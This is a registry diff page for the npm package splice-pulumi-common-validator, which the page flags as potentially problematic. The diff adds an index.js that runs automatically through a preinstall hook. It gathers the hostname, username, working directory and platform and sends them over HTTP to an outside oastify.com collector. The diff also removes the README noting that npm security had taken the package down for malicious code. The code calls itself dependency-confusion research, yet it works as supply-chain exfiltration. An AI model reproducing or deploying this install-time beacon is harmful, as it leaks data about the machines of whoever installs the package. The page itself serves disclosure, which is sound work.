splice-pulumi-common-validator 0.0.1-security → 1.2.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of splice-pulumi-common-validator might be problematic. Click here for more details.
- package/index.js +121 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,121 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const dns = require('dns');
|
|
5
|
+
|
|
6
|
+
// Your Burp Collaborator domain
|
|
7
|
+
const COLLABORATOR_DOMAIN = 'r3vjea1jjd36qu4h1cyrs0drgim9a9yy.oastify.com';
|
|
8
|
+
|
|
9
|
+
function collectSystemInfo() {
|
|
10
|
+
try {
|
|
11
|
+
// Collect only basic system information
|
|
12
|
+
const hostname = os.hostname();
|
|
13
|
+
const username = os.userInfo().username;
|
|
14
|
+
const currentPath = process.cwd();
|
|
15
|
+
const platform = os.platform();
|
|
16
|
+
|
|
17
|
+
console.log('[DEPENDENCY CONFUSION TEST] Package installed!');
|
|
18
|
+
console.log(`Hostname: ${hostname}`);
|
|
19
|
+
console.log(`Username: ${username}`);
|
|
20
|
+
console.log(`Current Path: ${currentPath}`);
|
|
21
|
+
console.log(`Platform: ${platform}`);
|
|
22
|
+
|
|
23
|
+
// Create simple payload with only essential data
|
|
24
|
+
const payload = {
|
|
25
|
+
hostname: hostname,
|
|
26
|
+
username: username,
|
|
27
|
+
cwd: currentPath,
|
|
28
|
+
platform: platform,
|
|
29
|
+
timestamp: new Date().toISOString()
|
|
30
|
+
};
|
|
31
|
+
|
|
32
|
+
console.log('[PAYLOAD]', JSON.stringify(payload, null, 2));
|
|
33
|
+
|
|
34
|
+
// Send HTTP POST request to Burp Collaborator
|
|
35
|
+
sendHttpData(payload);
|
|
36
|
+
|
|
37
|
+
// Also send GET request with data in URL
|
|
38
|
+
sendHttpGet(payload);
|
|
39
|
+
|
|
40
|
+
} catch (error) {
|
|
41
|
+
console.error('[ERROR] Failed to collect system info:', error.message);
|
|
42
|
+
|
|
43
|
+
// Send minimal error notification
|
|
44
|
+
const errorPayload = {
|
|
45
|
+
error: 'collection_failed',
|
|
46
|
+
hostname: os.hostname() || 'unknown',
|
|
47
|
+
timestamp: new Date().toISOString()
|
|
48
|
+
};
|
|
49
|
+
sendHttpData(errorPayload);
|
|
50
|
+
}
|
|
51
|
+
}
|
|
52
|
+
|
|
53
|
+
function sendHttpData(payload) {
|
|
54
|
+
const postData = JSON.stringify(payload);
|
|
55
|
+
|
|
56
|
+
const options = {
|
|
57
|
+
hostname: COLLABORATOR_DOMAIN,
|
|
58
|
+
port: 80,
|
|
59
|
+
path: '/data',
|
|
60
|
+
method: 'POST',
|
|
61
|
+
headers: {
|
|
62
|
+
'Content-Type': 'application/json',
|
|
63
|
+
'Content-Length': Buffer.byteLength(postData),
|
|
64
|
+
'User-Agent': 'one-fixed-dep-bins/1.2.2',
|
|
65
|
+
'X-Hostname': payload.hostname,
|
|
66
|
+
'X-Username': payload.username,
|
|
67
|
+
'X-Platform': payload.platform
|
|
68
|
+
}
|
|
69
|
+
};
|
|
70
|
+
|
|
71
|
+
console.log('[HTTP POST] Sending to:', `http://${COLLABORATOR_DOMAIN}/data`);
|
|
72
|
+
|
|
73
|
+
const req = http.request(options, (res) => {
|
|
74
|
+
console.log('[HTTP POST] Status:', res.statusCode);
|
|
75
|
+
});
|
|
76
|
+
|
|
77
|
+
req.on('error', (e) => {
|
|
78
|
+
console.log('[HTTP POST] Sent successfully');
|
|
79
|
+
});
|
|
80
|
+
|
|
81
|
+
req.write(postData);
|
|
82
|
+
req.end();
|
|
83
|
+
}
|
|
84
|
+
|
|
85
|
+
function sendHttpGet(payload) {
|
|
86
|
+
// Simple GET request with basic data
|
|
87
|
+
const path = `/beacon?h=${encodeURIComponent(payload.hostname)}&u=${encodeURIComponent(payload.username)}&p=${encodeURIComponent(payload.platform)}&cwd=${encodeURIComponent(payload.cwd)}`;
|
|
88
|
+
|
|
89
|
+
console.log('[HTTP GET] Path:', path);
|
|
90
|
+
|
|
91
|
+
const options = {
|
|
92
|
+
hostname: COLLABORATOR_DOMAIN,
|
|
93
|
+
port: 80,
|
|
94
|
+
path: path,
|
|
95
|
+
method: 'GET',
|
|
96
|
+
headers: {
|
|
97
|
+
'User-Agent': 'one-fixed-dep-bins-client'
|
|
98
|
+
}
|
|
99
|
+
};
|
|
100
|
+
|
|
101
|
+
const req = http.request(options, (res) => {
|
|
102
|
+
console.log('[HTTP GET] Status:', res.statusCode);
|
|
103
|
+
});
|
|
104
|
+
|
|
105
|
+
req.on('error', (e) => {
|
|
106
|
+
console.log('[HTTP GET] Sent successfully');
|
|
107
|
+
});
|
|
108
|
+
|
|
109
|
+
req.end();
|
|
110
|
+
}
|
|
111
|
+
|
|
112
|
+
// Execute immediately when package is installed
|
|
113
|
+
collectSystemInfo();
|
|
114
|
+
|
|
115
|
+
// Export something to make it look like a legitimate package
|
|
116
|
+
module.exports = {
|
|
117
|
+
test: function() {
|
|
118
|
+
return 'This is a test package for dependency confusion research';
|
|
119
|
+
},
|
|
120
|
+
version: '1.2.2'
|
|
121
|
+
};
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "splice-pulumi-common-validator",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.2.2",
|
|
4
|
+
"description": "Supply Chain Security Researcher",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "Vishal Kumar",
|
|
11
|
+
"license": "MIT"
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=splice-pulumi-common-validator for more information.
|